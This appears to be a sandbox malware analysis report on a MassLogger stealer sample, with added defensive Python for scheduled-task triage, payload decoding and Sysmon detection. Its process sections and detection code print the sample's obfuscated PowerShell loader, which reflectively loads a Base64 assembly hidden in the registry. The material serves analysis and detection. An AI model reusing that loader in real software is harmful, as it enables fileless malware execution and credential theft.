Malware Analysis Report

2025-08-10 20:05

Sample ID 250704-n8e53ssqv7
Target Attachment.rar
SHA256 0b6f160d8baf8abce7f7f540cf6d70bd94adc28257c294bacf7476c30518d40a
Tags
masslogger collection discovery execution persistence spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0b6f160d8baf8abce7f7f540cf6d70bd94adc28257c294bacf7476c30518d40a

Threat Level: Known bad

The file Attachment.rar was found to be: Known bad.

Malicious Activity Summary

masslogger collection discovery execution persistence spyware stealer

Masslogger family

MassLogger

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

outlook_office_path

Suspicious use of AdjustPrivilegeToken

outlook_win_path

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-07-04 12:03

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-07-04 12:03

Reported

2025-07-04 12:06

Platform

win10v2004-20250502-en

Max time kernel

143s

Max time network

142s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\light6645537.vbe"

Signatures

MassLogger

stealer spyware masslogger

Masslogger family

masslogger

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Accesses Microsoft Outlook profiles

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | checkip.dyndns.org | N/A | N/A
N/A | reallyfreegeoip.org | N/A | N/A
N/A | reallyfreegeoip.org | N/A | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 2364 set thread context of 3684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 680 wrote to memory of 2364 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 680 wrote to memory of 2364 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2364 wrote to memory of 3684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 2364 wrote to memory of 3684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 2364 wrote to memory of 3684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 2364 wrote to memory of 3684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 2364 wrote to memory of 3684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 2364 wrote to memory of 3684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 2364 wrote to memory of 3684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 2364 wrote to memory of 3684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Uses Task Scheduler COM API

persistence
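The sandbox attributes persistence to the Task Scheduler COM API rather than to schtasks.exe, and a second WScript.exe instance later runs the dropped C:\Users\Admin\AppData\Roaming\YSSUOWOXajxtsHt.VBS; the task definition itself is not in the report. On a host where the "Other Object Access Events" audit subcategory is enabled, a task created through the COM API still produces Security event 4698, whose TaskContent field carries the full task XML. The following is an added example, not code from the report or from the sample: Python that parses 4698 TaskContent and flags tasks whose action is a script host launching a script from a user-writable path. The task name, the logon trigger and both XML documents are constructed on the assumption that the task launches the dropped VBS; the real task is not shown in the report.

```python
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SCRIPT_HOSTS = {"wscript", "wscript.exe", "cscript", "cscript.exe"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf")
USER_WRITABLE = ("\\appdata\\", "%appdata%", "%localappdata%", "\\temp\\", "\\users\\public\\")
_XML_DECL = re.compile(r"^\s*<\?xml[^>]*\?>")


def _parse(task_xml: str) -> ET.Element:
    # 4698 TaskContent starts with <?xml ... encoding="UTF-16"?>. Handing that
    # declaration to expat as an already-decoded str raises ValueError, so strip it.
    return ET.fromstring(_XML_DECL.sub("", task_xml, count=1).lstrip())


def parse_task_actions(task_xml: str) -> List[Dict[str, str]]:
    """Return every <Exec> action as {"command": ..., "arguments": ...}."""
    root = _parse(task_xml)
    return [
        {"command": ex.findtext("t:Command", default="", namespaces=TASK_NS),
         "arguments": ex.findtext("t:Arguments", default="", namespaces=TASK_NS)}
        for ex in root.findall(".//t:Actions/t:Exec", TASK_NS)
    ]


def is_hidden(task_xml: str) -> bool:
    """<Settings><Hidden>true</Hidden> keeps the task out of the default Task Scheduler view."""
    value = _parse(task_xml).findtext(".//t:Settings/t:Hidden", default="false", namespaces=TASK_NS)
    return value.strip().lower() == "true"


def suspicious_script_task(task_xml: str) -> List[str]:
    """Reasons (empty if none) that a task definition looks like script-host persistence."""
    reasons = []
    for action in parse_task_actions(task_xml):
        host = action["command"].strip().strip('"').lower().rsplit("\\", 1)[-1]
        args = action["arguments"].strip().strip('"').lower()
        if host not in SCRIPT_HOSTS:
            continue
        reasons.append(f"action runs script host {host}")
        if args.endswith(SCRIPT_EXTS):
            reasons.append("argument is a script file")
        if any(marker in args for marker in USER_WRITABLE):
            reasons.append("script is under a user-writable path")
    if reasons and is_hidden(task_xml):
        reasons.append("task is marked hidden")
    return reasons


def triage_4698(records: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Run the check over parsed 4698 records ({"TaskName", "TaskContent"}) and keep the hits."""
    hits = []
    for rec in records:
        reasons = suspicious_script_task(rec["TaskContent"])
        if reasons:
            hits.append((rec["TaskName"], reasons))
    return hits


# --- constructed 4698 records; task name, trigger and XML are assumptions, not from the report ---
MALICIOUS_TASK = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\WScript.exe</Command>
      <Arguments>"C:\Users\Admin\AppData\Roaming\YSSUOWOXajxtsHt.VBS"</Arguments>
    </Exec>
  </Actions>
</Task>"""
BENIGN_TASK = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><Enabled>true</Enabled></CalendarTrigger></Triggers>
  <Actions Context="Author">
    <Exec><Command>C:\Program Files\Vendor\Updater.exe</Command><Arguments>/check</Arguments></Exec>
  </Actions>
</Task>"""
SAMPLE_4698 = [
    {"TaskName": r"\YSSUOWOXajxtsHt", "TaskContent": MALICIOUS_TASK},
    {"TaskName": r"\Vendor\Updater", "TaskContent": BENIGN_TASK},
]

if __name__ == "__main__":
    for name, reasons in triage_4698(SAMPLE_4698):
        print(name, "->", "; ".join(reasons))
```

The same parser works on the task XML that `schtasks /query /xml` or the COM API's `RegisteredTask.Xml` property returns, so it can be run over a live host's task store as well as over collected 4698 events.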

outlook_office_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A

outlook_win_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\light6645537.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command $r='HKCU:\Software\YSSUOWOXajxtsHt';$v='test';$d=gp $r;$a=[Convert]::FromBase64String(($d.$v|%{$_[-1..-($_.Length)]}) -join '');[System.Reflection.Assembly]::Load($a);[hem.hem]::hem($r.Split('\')[-1])

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\YSSUOWOXajxtsHt.VBS"
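The PowerShell stage above is a registry-resident loader: it reads the value `test` under HKCU:\Software\YSSUOWOXajxtsHt, reverses each string it gets back (`$_[-1..-($_.Length)]`), joins the pieces, Base64-decodes the result into a .NET assembly, loads it with `[System.Reflection.Assembly]::Load` and calls `[hem.hem]::hem` with the key name (`$r.Split('\')[-1]`, i.e. `YSSUOWOXajxtsHt`). The assembly never touches disk, which is why the file list below shows only the dropped VBS and PowerShell's own policy-test script. The following is an added example, not code from the report or from the sample: a Python implementation of the inverse transform, for recovering the staged assembly from an exported copy of that value (a .reg export or an offline hive parse) without executing it. Whether `test` is a single REG_SZ or a REG_MULTI_SZ is not visible in the report, so the decoder accepts either; the fake PE buffer, the chunking in `stage_like_loader` and its chunk size are constructed for the demonstration and are not the real payload.

```python
import base64
import hashlib
import struct
from typing import Iterable, List, Union


def decode_staged_payload(values: Union[str, Iterable[str]]) -> bytes:
    """Invert the loader's transform: reverse every string, join, Base64-decode.

    Mirrors `($d.$v | % { $_[-1..-($_.Length)] }) -join ''` followed by
    [Convert]::FromBase64String. A REG_SZ is one element; a REG_MULTI_SZ
    (or any array-valued property) is several, reversed one by one.
    """
    if isinstance(values, str):
        values = [values]
    joined = "".join(v[::-1] for v in values)
    # validate=True makes a mangled export (stray whitespace, wrong value)
    # fail loudly instead of yielding a silently truncated blob.
    return base64.b64decode(joined, validate=True)


def looks_like_pe(data: bytes) -> bool:
    """Cheap sanity check on the recovered blob: MZ stub and PE\\0\\0 at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def fingerprint(data: bytes) -> str:
    """SHA-256 of the recovered assembly, for pivoting to other reports."""
    return hashlib.sha256(data).hexdigest()


# --- constructed fixture, NOT the real payload ---------------------------------

def make_fake_pe() -> bytes:
    """A 128-byte buffer with a valid MZ/PE skeleton and no code at all."""
    buf = bytearray(0x80)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)          # e_lfanew -> offset 0x40
    buf[0x40:0x44] = b"PE\x00\x00"
    buf[0x44:] = bytes(range(0x80 - 0x44))           # filler so the blob is not all zero
    return bytes(buf)


def stage_like_loader(payload: bytes, chunk: int = 40) -> List[str]:
    """Produce strings the loader would accept: Base64, split into chunks, each chunk reversed.

    The chunk size is an assumption; the real value's layout is not shown in the report.
    """
    b64 = base64.b64encode(payload).decode("ascii")
    return [b64[i:i + chunk][::-1] for i in range(0, len(b64), chunk)]


if __name__ == "__main__":
    staged = stage_like_loader(make_fake_pe())
    blob = decode_staged_payload(staged)
    print("PE header ok:", looks_like_pe(blob), "sha256:", fingerprint(blob))
```

Because the loader reverses each element before joining, the export's value data will not decode as Base64 on its own; the recovered bytes only make sense after the per-element reversal, which is the step a quick `certutil -decode` or `base64 -d` would miss.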

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | checkip.dyndns.org | udp
DE | 193.122.6.168:80 | checkip.dyndns.org | tcp
US | 8.8.8.8:53 | reallyfreegeoip.org | udp
US | 104.21.80.1:443 | reallyfreegeoip.org | tcp
US | 8.8.8.8:53 | c.pki.goog | udp
GB | 142.250.180.3:80 | c.pki.goog | tcp
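Taken together, the process tree, the SetThreadContext and WriteProcessMemory events and the external IP lookups give a detection opportunity that does not depend on the archive's hash: WScript.exe launching a hidden PowerShell whose command line reads the registry, calls FromBase64String and Assembly.Load; PowerShell then launching AddInProcess32.exe, a .NET add-in host that is not normally a child of PowerShell and here serves as the hollowing target; and lookups of checkip.dyndns.org and reallyfreegeoip.org. The following is an added example, not part of the report: Python detection logic over Sysmon-style process-creation (EventID 1) and DNS (EventID 22) records, run against a constructed event set that mirrors the behavioral1 tree and its PIDs. The field names follow Sysmon's; the events are constructed, the explorer.exe parent is an assumption, and the report does not attribute the DNS lookups to a process, so the hollowed host is assumed.

```python
import re
from typing import Dict, List

# Markers of the registry-resident reflective loader in the report's
# powershell.exe command line. Three of four must match so that a lone
# "-WindowStyle Hidden" (common in admin scripts) does not fire the rule.
LOADER_MARKERS = {
    "hidden_window": re.compile(r"-WindowStyle\s+Hidden", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "reflective_load": re.compile(r"\[System\.Reflection\.Assembly\]::Load\b", re.I),
    "registry_read": re.compile(r"(?<![\w-])(?:gp|Get-ItemProperty)\s", re.I),
}
GEO_IP_SERVICES = {"checkip.dyndns.org", "reallyfreegeoip.org"}
SCRIPT_HOSTS = ("\\wscript.exe", "\\cscript.exe")
POWERSHELL = ("\\powershell.exe", "\\pwsh.exe")
# The sandbox shows the 32-bit host being hollowed; the 64-bit sibling is
# included as an assumption, not as an observation from the report.
HOLLOW_TARGETS = ("\\addinprocess32.exe", "\\addinprocess.exe")


def _is(image: str, suffixes) -> bool:
    return image.lower().endswith(suffixes)


def detect(events: List[Dict]) -> List[Dict]:
    """Evaluate Sysmon-style records: EventID 1 (process create) and 22 (DNS query)."""
    findings = []
    for e in events:
        if e["EventID"] == 1:
            image, parent, cmd = e["Image"], e["ParentImage"], e["CommandLine"]
            if _is(image, POWERSHELL) and _is(parent, SCRIPT_HOSTS):
                hits = [name for name, rx in LOADER_MARKERS.items() if rx.search(cmd)]
                if len(hits) >= 3:
                    findings.append({"rule": "script_host_spawns_reflective_powershell",
                                     "pid": e["ProcessId"], "evidence": hits})
            if _is(image, HOLLOW_TARGETS) and _is(parent, POWERSHELL):
                findings.append({"rule": "powershell_spawns_addinprocess",
                                 "pid": e["ProcessId"], "evidence": [image]})
        elif e["EventID"] == 22 and e["QueryName"].lower() in GEO_IP_SERVICES:
            findings.append({"rule": "external_ip_lookup",
                             "pid": e["ProcessId"], "evidence": [e["QueryName"]]})
    return findings


def chain_for(events: List[Dict], pid: int) -> List[str]:
    """Follow ParentProcessId links and return image basenames, root first."""
    procs = {e["ProcessId"]: e for e in events if e["EventID"] == 1}
    names, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        names.append(procs[pid]["Image"].rsplit("\\", 1)[-1])
        pid = procs[pid]["ParentProcessId"]
    return names[::-1]


# --- constructed events mirroring the behavioral1 tree (PIDs 680 -> 2364 -> 3684) ---
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WS = r"C:\Windows\System32\WScript.exe"
AIP = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
LOADER_CMD = r""""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command $r='HKCU:\Software\YSSUOWOXajxtsHt';$v='test';$d=gp $r;$a=[Convert]::FromBase64String(($d.$v|%{$_[-1..-($_.Length)]}) -join '');[System.Reflection.Assembly]::Load($a);[hem.hem]::hem($r.Split('\')[-1])"""
SAMPLE_EVENTS = [
    # explorer.exe as the parent of WScript.exe is an assumption; the report shows no parent.
    {"EventID": 1, "ProcessId": 680, "ParentProcessId": 4000, "Image": WS,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\light6645537.vbe"'},
    {"EventID": 1, "ProcessId": 2364, "ParentProcessId": 680, "Image": PS, "ParentImage": WS,
     "CommandLine": LOADER_CMD},
    {"EventID": 1, "ProcessId": 3684, "ParentProcessId": 2364, "Image": AIP, "ParentImage": PS,
     "CommandLine": '"' + AIP + '"'},
    # The report does not say which process resolved these names; the hollowed host is assumed.
    {"EventID": 22, "ProcessId": 3684, "Image": AIP, "QueryName": "checkip.dyndns.org"},
    {"EventID": 22, "ProcessId": 3684, "Image": AIP, "QueryName": "reallyfreegeoip.org"},
    {"EventID": 22, "ProcessId": 3684, "Image": AIP, "QueryName": "c.pki.goog"},  # certificate traffic, not flagged
    # Benign control: a hidden but ordinary script-host-launched PowerShell must not fire.
    {"EventID": 1, "ProcessId": 6666, "ParentProcessId": 680, "Image": PS, "ParentImage": WS,
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -File C:\scripts\inventory.ps1'},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f["rule"], f["pid"], " > ".join(chain_for(SAMPLE_EVENTS, f["pid"])), f["evidence"])
```

The `external_ip_lookup` rule is weak on its own (plenty of legitimate software asks these services for its public address); its value is as corroboration when it fires on the same host, within the same minutes, as the chain rules.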

Files

memory/2364-2-0x000001FCD6B90000-0x000001FCD6BA0000-memory.dmp

memory/2364-1-0x000001FCD6B90000-0x000001FCD6BA0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iqcpt1ye.f54.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2364-12-0x000001FCBE5E0000-0x000001FCBE602000-memory.dmp

memory/2364-13-0x000001FCBCD60000-0x000001FCBCD6A000-memory.dmp

memory/2364-14-0x000001FCD6B70000-0x000001FCD6B7A000-memory.dmp

memory/3684-15-0x0000000000D10000-0x0000000000D2C000-memory.dmp

memory/3684-18-0x00000000056D0000-0x0000000005C74000-memory.dmp

memory/3684-19-0x0000000005200000-0x000000000529C000-memory.dmp

memory/3684-20-0x00000000063E0000-0x0000000006472000-memory.dmp

memory/3684-21-0x0000000006390000-0x00000000063E0000-memory.dmp

memory/3684-22-0x0000000006750000-0x0000000006912000-memory.dmp

memory/3684-23-0x00000000066F0000-0x00000000066FA000-memory.dmp

C:\Users\Admin\AppData\Roaming\YSSUOWOXajxtsHt.VBS

MD5 1cacd0362bf0f7c175193309f29b89b1
SHA1 9806970450b0294338bc13fd80b7ae56841d24b0
SHA256 f9dd2982f5735013c18de076016a6a603ce7d3010be26c011117a9cbbef1d778
SHA512 a85146b5d09f8865f95c8f6f3e4ad0bd091d1b2b39d56c1a5fbf823a344daf208f8f59a081af71989efe9b20a0de3d147cb89271a5dc9a34b8b505a8333aa507

Analysis: behavioral2

Detonation Overview

Submitted

2025-07-04 12:03

Reported

2025-07-04 12:06

Platform

win11-20250502-en

Max time kernel

144s

Max time network

111s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\light6645537.vbe"

Signatures

MassLogger

stealer spyware masslogger

Masslogger family

masslogger

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Accesses Microsoft Outlook profiles

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | checkip.dyndns.org | N/A | N/A
N/A | reallyfreegeoip.org | N/A | N/A
N/A | reallyfreegeoip.org | N/A | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 3892 set thread context of 4040 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3868 wrote to memory of 3892 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3868 wrote to memory of 3892 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3892 wrote to memory of 4040 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3892 wrote to memory of 4040 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3892 wrote to memory of 4040 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3892 wrote to memory of 4040 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3892 wrote to memory of 4040 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3892 wrote to memory of 4040 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3892 wrote to memory of 4040 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 3892 wrote to memory of 4040 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A

outlook_win_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-3518521428-3897247806-4080064211-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\light6645537.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command $r='HKCU:\Software\YSSUOWOXajxtsHt';$v='test';$d=gp $r;$a=[Convert]::FromBase64String(($d.$v|%{$_[-1..-($_.Length)]}) -join '');[System.Reflection.Assembly]::Load($a);[hem.hem]::hem($r.Split('\')[-1])

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\YSSUOWOXajxtsHt.VBS"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | checkip.dyndns.org | udp
JP | 132.226.8.169:80 | checkip.dyndns.org | tcp
US | 104.21.112.1:443 | reallyfreegeoip.org | tcp
US | 52.111.227.11:443 | | tcp

Files

memory/3892-1-0x00007FF817973000-0x00007FF817975000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_figmuiqx.hbx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3892-10-0x0000019F31710000-0x0000019F31732000-memory.dmp

memory/3892-11-0x00007FF817970000-0x00007FF818432000-memory.dmp

memory/3892-12-0x00007FF817970000-0x00007FF818432000-memory.dmp

memory/3892-13-0x00007FF817970000-0x00007FF818432000-memory.dmp

memory/3892-14-0x0000019F19440000-0x0000019F1944A000-memory.dmp

memory/3892-15-0x0000019F31700000-0x0000019F3170A000-memory.dmp

memory/4040-16-0x0000000000540000-0x000000000055C000-memory.dmp

memory/4040-19-0x00000000751AE000-0x00000000751AF000-memory.dmp

memory/4040-20-0x00000000054F0000-0x0000000005A96000-memory.dmp

memory/4040-21-0x0000000004FE0000-0x000000000507C000-memory.dmp

memory/4040-22-0x0000000006000000-0x0000000006092000-memory.dmp

memory/4040-23-0x0000000005FB0000-0x0000000006000000-memory.dmp

memory/3892-24-0x00007FF817970000-0x00007FF818432000-memory.dmp

memory/4040-25-0x0000000006370000-0x0000000006532000-memory.dmp

memory/4040-26-0x0000000006300000-0x000000000630A000-memory.dmp

memory/4040-27-0x00000000751AE000-0x00000000751AF000-memory.dmp

C:\Users\Admin\AppData\Roaming\YSSUOWOXajxtsHt.VBS

MD5 1cacd0362bf0f7c175193309f29b89b1
SHA1 9806970450b0294338bc13fd80b7ae56841d24b0
SHA256 f9dd2982f5735013c18de076016a6a603ce7d3010be26c011117a9cbbef1d778
